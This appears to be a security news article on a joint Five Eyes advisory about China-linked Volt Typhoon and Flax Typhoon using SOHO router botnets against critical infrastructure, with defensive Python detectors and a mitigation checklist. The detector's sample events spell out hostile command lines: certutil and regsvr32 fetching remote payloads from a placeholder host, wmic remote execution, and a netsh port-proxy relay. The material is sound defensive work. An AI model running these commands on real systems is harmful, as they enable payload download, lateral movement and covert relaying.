Five Eyes Advisory: China-Nexus Volt Typhoon and Flax Typhoon Using SOHO Router Botnets to Pre-Position in Critical Infrastructure

A joint advisory from CISA, NCSC-UK, the Australian Signals Directorate, and their Five Eyes partners confirms that China-linked threat actors including Volt Typhoon and Flax Typhoon are systematically compromising small-office and home-office routers to build operational relay networks for espionage and pre-positioned attacks against critical national infrastructure. Organisations should audit edge device inventories and enforce firmware update policies.


A joint advisory from the US Cybersecurity and Infrastructure Security Agency, the UK National Cyber Security Centre, Australia’s ASD/ACSC, and partner agencies in Canada and New Zealand has formally confirmed that China state-sponsored threat actors — operating under the designations Volt Typhoon and Flax Typhoon — are systematically building and operating SOHO (small-office/home-office) router botnets as operational relay infrastructure for espionage campaigns and pre-positioned attacks against Western critical infrastructure sectors.

What the Advisory Describes

The advisory, designated AA26-113A, synthesises intelligence gathered across the Five Eyes alliance and describes a coherent Chinese strategic programme — rather than opportunistic exploitation — involving several distinct actor clusters:

Volt Typhoon (Microsoft/CISA designation) focuses on critical national infrastructure pre-positioning: compromising systems in telecommunications, energy, water utilities, transportation, and government networks — not to immediately cause damage, but to establish durable footholds that could be activated in a future conflict scenario. Volt Typhoon’s operations are characterised by extreme operational patience and a heavy reliance on living-off-the-land techniques to blend with legitimate administrative traffic.

Flax Typhoon (Microsoft designation) operates a large botnet — tracked separately as Raptor Train by Black Lotus Labs, attributed to the contractor Integrity Technology Group by the US DoJ’s October 2024 disruption operation — that served as the operational relay layer for both espionage and potential sabotage activities. The advisory confirms that the October 2024 disruption reduced but did not eliminate Flax Typhoon’s infrastructure.

The advisory details the SOHO router botnet methodology: actors compromise internet-facing devices — predominantly Cisco IOS routers, DrayTek routers, Netgear devices, and Zyxel firewalls — via known CVEs and default credentials, then use the compromised device population as a traffic-forwarding layer that routes all C2 communications through geographically distributed “legitimate” IP addresses. When defenders investigate anomalous connections, they trace back to a consumer router in a different country — not to attacker infrastructure.

The Strategic Significance

What distinguishes Volt Typhoon’s campaign from traditional espionage operations is the advisory’s explicit language about pre-positioning: the advisory states that the intelligence community assesses Chinese actors are establishing persistent access that would allow disruption of communications, transportation, and energy infrastructure in the event of a US-China conflict over Taiwan or in the South China Sea.

This elevates the threat model beyond espionage (data theft) to potential sabotage preparation. The advisory notes evidence of Volt Typhoon actors mapping OT environments, identifying safety system configurations, and in some cases establishing persistence on networks that control physical infrastructure — not merely IT networks.

Enterprise Defender Implications

Most organisations directly affected by Volt Typhoon operations are critical infrastructure operators. However, the advisory has broader implications:

SOHO device security: Organisations that allow employees to work from home via unmanaged personal routers — or that use small business-grade routers in branch offices — are providing the inventory from which this botnet is built. Any SOHO or branch-office router running known-vulnerable firmware is a potential relay node.

VPN and edge device hygiene: Volt Typhoon’s initial access techniques include exploitation of internet-facing network equipment and VPN appliances, consistent with the priority placed on Palo Alto GlobalProtect, Citrix ADC/Gateway, and Cisco devices. The advisory’s indicators of compromise should be run against VPN gateway logs.

Living-off-the-land detection: LOTL detection — monitoring for use of native system tools (wmic, certutil, regsvr32, netsh) in anomalous patterns — is the primary detection avenue for Volt Typhoon activity. EDR telemetry and SIEM rules configured for LOTL technique detection are more effective than signature-based defences against this actor.
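As an added illustration (not code from the advisory or this article), the following Python detector runs over constructed process-creation events and flags the four native tools named above when they appear with unusual arguments or for the first time on a host. The simplified event layout, the argument patterns and the host/binary baseline are this example's own assumptions.

```python
import re
# Constructed process-creation events in a simplified Sysmon Event ID 1 layout
# (host|user|parent_image|image|command_line); not real telemetry.
SAMPLE_EVENTS = """\
ws01|alice|explorer.exe|notepad.exe|notepad.exe notes.txt
ws01|alice|cmd.exe|netsh.exe|netsh interface portproxy add v4tov4 listenport=8443 connectaddress=10.0.5.7
srv02|svc-backup|wmiprvse.exe|wmic.exe|wmic /node:srv03 process call create "cmd /c whoami"
ws03|bob|cmd.exe|certutil.exe|certutil -urlcache -f http://203.0.113.9/f.txt f.txt
ws03|bob|cmd.exe|regsvr32.exe|regsvr32 /s /i:http://203.0.113.9/x.sct scrobj.dll
srv04|admin|cmd.exe|netsh.exe|netsh advfirewall show allprofiles
srv04|admin|mmc.exe|certutil.exe|certutil -verify cert.cer
"""

# The four native tools the article names; the argument patterns are this example's own choices.
LOTL_BINARIES = {"wmic.exe", "certutil.exe", "regsvr32.exe", "netsh.exe"}
REMOTE_RE = re.compile(r"\b(?:https?|ftp)://|\\\\[^\\\s]+\\", re.I)  # URL or UNC path in args
ANOMALOUS_ARGS = {
    "netsh.exe": re.compile(r"\bportproxy\b.*\badd\b|\badvfirewall\b.*\b(?:add|set|delete)\b", re.I),
    "wmic.exe": re.compile(r"process\s+call\s+create|/node:", re.I),
    "certutil.exe": re.compile(r"-urlcache|-decode|-encode", re.I),
    "regsvr32.exe": re.compile(r"/i:|scrobj\.dll", re.I),
}

def parse_events(text):
    events = []
    for line in text.strip().splitlines():
        host, user, parent, image, cmdline = line.split("|", 4)
        events.append({"host": host, "user": user, "parent": parent,
                       "image": image.lower(), "cmdline": cmdline})
    return events

def detect_lotl(events, baseline=()):
    """Return (event, reasons) pairs. baseline holds (host, image) pairs seen in a
    known-good period; a LOTL binary's first appearance on a host is flagged too."""
    baseline = set(baseline)
    hits = []
    for ev in events:
        if ev["image"] not in LOTL_BINARIES:
            continue  # only the native tools of interest are scored
        reasons = []
        if REMOTE_RE.search(ev["cmdline"]):
            reasons.append("remote resource in command line")
        if ANOMALOUS_ARGS[ev["image"]].search(ev["cmdline"]):
            reasons.append("anomalous argument pattern")
        if (ev["host"], ev["image"]) not in baseline:
            reasons.append("first use of binary on host")
        if reasons:
            hits.append((ev, reasons))
    return hits
```

In a SIEM the baseline would be built from weeks of telemetry per host, so that routine administrative use of netsh or certutil on a known server scores nothing while the same binary on a workstation that has never run it does.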

  • Review and apply the advisory’s full IOC list across network logs, firewall logs, and endpoint telemetry
  • Audit all internet-facing routers, firewalls, and VPN appliances for firmware currency — specifically focus on devices matching the advisory’s targeted models
  • Review outbound network traffic from OT and ICS environments for connections to IP ranges listed in the advisory
  • Ensure MFA is enforced on all remote access pathways — Volt Typhoon routinely pivots from compromised edge devices to internal networks via legitimate-looking remote access
  • Forward the advisory to your ISP’s security team if you operate critical infrastructure — several Volt Typhoon TTPs are detectable at the ISP level
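The third item above, checking OT/ICS egress against the advisory's IP ranges, as an added Python example that is not part of the article or the advisory. The address ranges, the OT subnet and the NetFlow-style records are constructed placeholders; the real ranges must be taken from AA26-113A itself.

```python
import ipaddress

# Constructed placeholders standing in for the advisory's listed IP ranges.
ADVISORY_RANGES = ["203.0.113.0/24", "198.51.100.17", "2001:db8:beef::/48"]
OT_SUBNETS = ["10.40.0.0/16"]  # constructed: the plant / ICS address space

# Constructed NetFlow-style export: timestamp,src,dst,dst_port,bytes
SAMPLE_FLOWS = """\
2026-04-23T02:11:05Z,10.40.3.21,10.40.1.5,502,1200
2026-04-23T02:12:40Z,10.40.3.21,203.0.113.77,443,8800
2026-04-23T02:13:02Z,10.20.8.9,203.0.113.77,443,300
2026-04-23T02:14:11Z,10.40.7.3,198.51.100.17,8443,15000
2026-04-23T02:15:00Z,10.40.7.3,2001:db8:beef:1::9,443,900
2026-04-23T02:16:30Z,10.40.2.2,192.0.2.44,443,500
"""

def load_networks(entries):
    """Accept bare addresses and CIDRs; strict=False tolerates host bits being set."""
    return [ipaddress.ip_network(e, strict=False) for e in entries]

def in_any(addr, networks):
    ip = ipaddress.ip_address(addr)
    # an IPv4 address is never inside an IPv6 range and vice versa
    return any(ip.version == net.version and ip in net for net in networks)

def find_ot_to_advisory(flow_text, advisory=ADVISORY_RANGES, ot=OT_SUBNETS):
    """Return flows whose source is in an OT subnet and whose destination is listed."""
    adv_nets, ot_nets = load_networks(advisory), load_networks(ot)
    hits = []
    for line in flow_text.strip().splitlines():
        ts, src, dst, port, nbytes = line.split(",")
        if in_any(src, ot_nets) and in_any(dst, adv_nets):
            hits.append({"ts": ts, "src": src, "dst": dst,
                         "port": int(port), "bytes": int(nbytes)})
    return hits

if __name__ == "__main__":
    for h in find_ot_to_advisory(SAMPLE_FLOWS):
        print(f'{h["ts"]} {h["src"]} -> {h["dst"]}:{h["port"]} ({h["bytes"]} bytes)')
```

The corporate-side flow to the same listed address is deliberately left out of the result so that the OT hits can be triaged first; a second pass over all sources covers the rest of the IOC sweep.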
